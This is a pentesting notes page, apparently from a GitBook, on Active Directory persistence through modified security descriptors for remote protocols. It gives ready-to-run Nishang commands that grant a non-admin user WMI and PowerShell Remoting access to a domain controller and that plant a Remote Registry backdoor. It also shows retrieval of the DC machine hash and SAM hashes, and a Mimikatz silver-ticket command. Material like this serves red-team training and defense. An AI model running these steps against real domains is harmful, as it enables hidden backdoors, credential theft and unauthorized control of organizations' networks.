☠️
Pentesting Articles and Notes
  • Welcome!
  • Windows
    • Active Directory
      • Kerberos Authentication
      • Enumeration
        • Basic Enumeration
        • Access Control Lists
        • Domain Trusts and Forests Enumeration
        • User Hunting
        • Domain Enumeration With BloodHound
      • Credential Dumping
        • DCSync Attack
      • Privilege Escalation
        • AS-REP Roasting
        • Kerberoasting
        • DNS Administrators
        • Setting Object SPN's
        • Unconstrained Delegation
        • Constrained Delegation
      • Persistence
        • Abusing ACLs
        • AdminSDHolder
        • Custom Security Service Providers (SSP's)
        • Directory Services Restore Mode (DSRM)
        • Modifying Remote Protocol Security Descriptors
        • Golden Tickets
        • Silver Tickets
        • Skeleton Keys
      • Powershell Remoting
      • Lateral Movement
        • Child to Parent Movement Across Trusts
        • Trust Abuse Between Forests
        • MSSQL Server Trust Abuse
        • Overpass the Hash
  • Coding
    • Pentesting With Python
      • Basic Threading
  • Network Attacks
    • Man-In-The-Middle Attacks
      • ARP Spoofing
      • DNS Spoofing Attacks
Powered by GitBook
On this page
  • Modifying the Descriptors Manually From the DC - Giving a User Full Control Over the WMI Namespace
  • Step 1 - In Component Services, Change the DCOM Permissions of the Computer
  • Step 2 - Modify the WMI Namespace Settings in Computer Management
  • Step 3 - Check the Access of the Non-Admin User to the DC
  • Giving a User Access to WMI From Powershell
  • With Set-RemoteWMI.ps1 (from Nishang)
  • To Remove the Modified Descriptor
  • Change the Powershell Remoting Descriptors
  • With Set-RemotePSRemoting.ps1 (from Nishang)
  • Then Execute Commands Remotely on the DC
  • Changing the Remote Registry to Add a Backdoor and Retrieve Hashes
  • Step 1 - With Add-RemoteRegBackdoor.ps1
  • Step 2 - In a New Window as the User, Use RemoteHashRetrieval.ps1
  • Step 3 - Exploit
  1. Windows
  2. Active Directory
  3. Persistence

Modifying Remote Protocol Security Descriptors

PreviousDirectory Services Restore Mode (DSRM)NextGolden Tickets

Last updated 3 years ago

This is an interesting way to obtain persistence because the ACL's for Remoting Protocols are rarely audited.

You must have Domain Admin privileges to perform these attacks. Modifying these descriptors can give non-admin users access to such things as WMI, Powershell Remoting, and the Remote Registry without having to give him Domain Admin privileges.

Subsequently the non-admin user will then be able to execute commands on the DC despite not being an admin.

Modifying the Descriptors Manually From the DC - Giving a User Full Control Over the WMI Namespace

Step 1 - In Component Services, Change the DCOM Permissions of the Computer

  • Give the user Remote Access permissions

  • Then give him all Launch and Activation permissions

Step 2 - Modify the WMI Namespace Settings in Computer Management

  • Give the user full rights over the root WMI namespace

  • Then make sure those rights apply to all of the child namespaces as well

Step 3 - Check the Access of the Non-Admin User to the DC

PS C:\Windows\system32> Get-WmiObject -Class win32_operatingsystem -ComputerName dc.domain


SystemDirectory : C:\Windows\system32
Organization    :
BuildNumber     : 14393
RegisteredUser  : Windows User
SerialNumber    : 00377-80000-00000-AA805
Version         : 10.0.14393

Now our user can execute commands on the DC.

Giving a User Access to WMI From Powershell

With Set-RemoteWMI.ps1 (from Nishang)

. .\Set-RemoteWMI.ps1

Set-RemoteWMI -ComputerName <dc> -UserName <user> -Namespace 'root\cimv2' -verbose [-Credential <Domain Admin>]

Then login as that user and check the access:

Get-WmiObject -Class win32_operatingsystem -ComputerName <dc>

To Remove the Modified Descriptor

Set-RemoteWMI -ComputerName <dc> -UserName <user> -Namespace 'root\cimv2' -verbose -Remove [-Credential <Domain Admin>]

Change the Powershell Remoting Descriptors

With Set-RemotePSRemoting.ps1 (from Nishang)

Set-RemotePSRemoting -UserName <user> -ComputerName <dc> -Verbose

Then Execute Commands Remotely on the DC

Invoke-Command -ComputerName <dc> -ScriptBlock {<command>}

Changing the Remote Registry to Add a Backdoor and Retrieve Hashes

Step 1 - With Add-RemoteRegBackdoor.ps1

. .\Add-RemoteRegBackdoor.ps1

Add-RemoteRegBackdoor -ComputerName <dc> -Trustee <user>

Step 2 - In a New Window as the User, Use RemoteHashRetrieval.ps1

# Get the DC Machine Hash
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose

# Dump the Local SAM Hashes
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose

Step 3 - Exploit

  • With the DC hash we can create Silver Tickets.

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<target-domain> /service:<service> /rc4:<service-acct-or-computer-hash> /user:Administrator /ptt"'
  • With the Local Administrator hash we can DCSync or take advantage of the local Administrator hash being the DSRM password.